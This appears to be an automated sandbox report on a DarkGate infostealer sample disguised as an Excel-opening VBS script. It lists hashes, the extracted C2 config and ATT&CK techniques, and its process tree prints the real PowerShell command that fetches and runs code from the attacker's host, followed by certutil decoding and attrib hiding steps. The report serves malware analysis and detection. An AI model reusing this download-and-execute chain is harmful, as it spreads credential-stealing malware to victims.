darkgate | ba8f84fdc1678e133ad265e357e99dba7031872371d444e84d6a47a022914de9

General

Target

15032024_0927_EXCEL_OPEN_DOC.vbs
Size

14KB
MD5

e9da2f1fbf627a05811cf294a1136a64
SHA1

792924ff455d06257c226f7f276d8776389b0b5a
SHA256

ba8f84fdc1678e133ad265e357e99dba7031872371d444e84d6a47a022914de9
SHA512

150c1f8cb56e500d9459c05ec17908134a2e52b2e3e229c8e85eaac6b7985e788765c60a11984452456176e95f4d0b0242dfd69f84b94f101a68ddec470438c7
SSDEEP

192:YMg119gkCtL3IqSPN3QzGNzUoNzhLnOdEpeLSHZgNdPR/Dnm9V4nN6U5UTUBUF:jy19gR3IquNgzG2oNdOdEpeeqlPk

Score

10^/10

darkgate admin888 stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

C2

nextroundst.com

Attributes

anti_analysis
true
anti_debug
false
anti_vm
true
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
false
internal_mutex
NeONIafa
minimum_disk
50
minimum_ram
4000
ping_interval
6
rootkit
false
startup_persistence
true
username
admin888

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 2 IoCs

resource	yara_rule
behavioral2/memory/2740-28-0x0000000004AF0000-0x0000000004B63000-memory.dmp	family_darkgate_v6
behavioral2/memory/2740-30-0x0000000004AF0000-0x0000000004B63000-memory.dmp	family_darkgate_v6

Blocklisted process makes network request 4 IoCs

flow	pid	Process
8	4388	powershell.exe
12	4388	powershell.exe
63	4388	powershell.exe
64	4388	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
2740	AutoHotkey.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4388	powershell.exe
4388	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4388	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1012 wrote to memory of 4388	1012	WScript.exe	90
PID 1012 wrote to memory of 4388	1012	WScript.exe	90
PID 4388 wrote to memory of 1680	4388	powershell.exe	102
PID 4388 wrote to memory of 1680	4388	powershell.exe	102
PID 4388 wrote to memory of 2740	4388	powershell.exe	104
PID 4388 wrote to memory of 2740	4388	powershell.exe	104
PID 4388 wrote to memory of 2740	4388	powershell.exe	104
PID 4388 wrote to memory of 2708	4388	powershell.exe	105
PID 4388 wrote to memory of 2708	4388	powershell.exe	105

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2708	attrib.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15032024_0927_EXCEL_OPEN_DOC.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'nextroundst.com/kqcmvqtj')
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4388
- - C:\Windows\system32\certutil.exe
    "C:\Windows\system32\certutil.exe" -decodehex a.bin AutoHotkey.exe
    3⤵
    PID:1680
- - C:\st\AutoHotkey.exe
    "C:\st\AutoHotkey.exe" script.ahk
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    PID:2740
- - C:\Windows\system32\attrib.exe
    "C:\Windows\system32\attrib.exe" +h C:/st
    3⤵
    - Views/modifies file attributes
    PID:2708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

1

T1564

Hidden Files and Directories

1

T1564.001

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rpwxy5wi.se0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\st\AutoHotkey.exe

Filesize
892KB

MD5
a59a2d3e5dda7aca6ec879263aa42fd3

SHA1
312d496ec90eb30d5319307d47bfef602b6b8c6c

SHA256
897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb

SHA512
852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030

Download Submit
C:\st\a.bin

Filesize
1.7MB

MD5
bf88d228baec74c7928df463db0f0fdc

SHA1
efe1657bb9a9a31742b71d8c14bae89b2ab5533b

SHA256
493099b55ea0da872d3b9855c5a60752833e737be547ebc5328caea2bf0542ed

SHA512
c247a0dbba9971a8949729f888a4d8b10ca188b6fabedb9d1fe9cc7907cc4d807e66f3367ca287bf1e4062c342cbb7a724a9cc168018f55bc187e04897c8bdfa

Download Submit
C:\st\script.ahk

Filesize
48KB

MD5
2e319e5e6ab619a01eb3b95cd11c8143

SHA1
d7f963ba0a824406e260e2469c2a04767f2afb8c

SHA256
3b7a634458e8195a13a4c1610bb25d78a77f2b904b38835fca391d38509dd530

SHA512
f862af250709b54ebfc4c26236e6947f44468bc908b5f0d70443e483d5cf30efce505b2d5036ba09dfc9c2cc0e9b2a3adb1a6cd6e829d82e4156d75e597ac5c2

Download Submit
C:\st\test.txt

Filesize
913KB

MD5
f5a710f2471af13c14c80b190081b93e

SHA1
24802c121cd6faa57a3b96de8e108b3250a390a9

SHA256
738393c9e46150b246a0db906a22d77ba93812840919bf8b4913ef528df95e35

SHA512
9507fa2e05a10a4c927b84a3e5764a9634d7f5cf76c8c46b41229c8502376b80af624b08602bac2d585f1bee4a1f262053bd6d96886c72588dac1359c7413d52

Download Submit
memory/2740-30-0x0000000004AF0000-0x0000000004B63000-memory.dmp

Filesize
460KB

Download
memory/2740-28-0x0000000004AF0000-0x0000000004B63000-memory.dmp

Filesize
460KB

Download
memory/4388-10-0x00007FF97E460000-0x00007FF97EF21000-memory.dmp

Filesize
10.8MB

Download
memory/4388-19-0x0000012F26E00000-0x0000012F26E10000-memory.dmp

Filesize
64KB

Download
memory/4388-14-0x00007FF97E460000-0x00007FF97EF21000-memory.dmp

Filesize
10.8MB

Download
memory/4388-25-0x00007FF97E460000-0x00007FF97EF21000-memory.dmp

Filesize
10.8MB

Download
memory/4388-13-0x0000012F43430000-0x0000012F435F2000-memory.dmp

Filesize
1.8MB

Download
memory/4388-12-0x0000012F26E00000-0x0000012F26E10000-memory.dmp

Filesize
64KB

Download
memory/4388-11-0x0000012F26E00000-0x0000012F26E10000-memory.dmp

Filesize
64KB

Download
memory/4388-9-0x0000012F28A50000-0x0000012F28A72000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads